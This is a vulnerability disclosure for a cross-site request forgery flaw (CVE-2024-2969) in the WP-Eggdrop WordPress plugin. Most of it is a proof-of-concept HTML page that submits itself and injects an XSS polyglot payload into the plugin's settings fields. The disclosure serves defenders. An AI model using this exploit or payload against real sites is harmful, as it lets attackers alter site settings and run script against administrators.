Description
The WP-Eggdrop plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.1. This is due to missing or incorrect nonce validation on the wpegg_updateOptions() function. This makes it possible for unauthenticated attackers to update the plugin’s settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
Severity
5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
Affected Version
<= 0.1
PoC :
<html>
<!-- eneriiiiiii -->
<body>
<form action="http://[ASSETS]/wp-admin/options-general.php?page=wpegg" method="POST">
<input type="hidden" name="wpegg_server" value="JavaScript://%0A/*?'/*\\'/*"/*\\"/*`/*\\`/*')/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(confirm)(1331+6)}//><Base/Href=//ener1-s3c.github.io/\\76-->" />
<input type="hidden" name="wpegg_port" value="666" />
<input type="hidden" name="wpegg_password" value="JavaScript://%0A/*?'/*\\'/*"/*\\"/*`/*\\`/*')/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(confirm)(1331+6)}//><Base/Href=//ener1-s3c.github.io/\\76-->" />
<input type="hidden" name="wpegg_message" value="JavaScript://%0A/*?'/*\\'/*"/*\\"/*`/*\\`/*')/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(confirm)(1331+6)}//><Base/Href=//ener1-s3c.github.io/\\76-->" />
<input type="hidden" name="wpegg_submit" value="Update Options »" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
Reference
- https://plugins.trac.wordpress.org/browser/wp-eggdrop/trunk/wp-eggdrop.php#L215
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-eggdrop/wp-eggdrop-01-cross-site-request-forgery-to-settings-update
- https://www.cve.org/CVERecord?id=CVE-2024-2969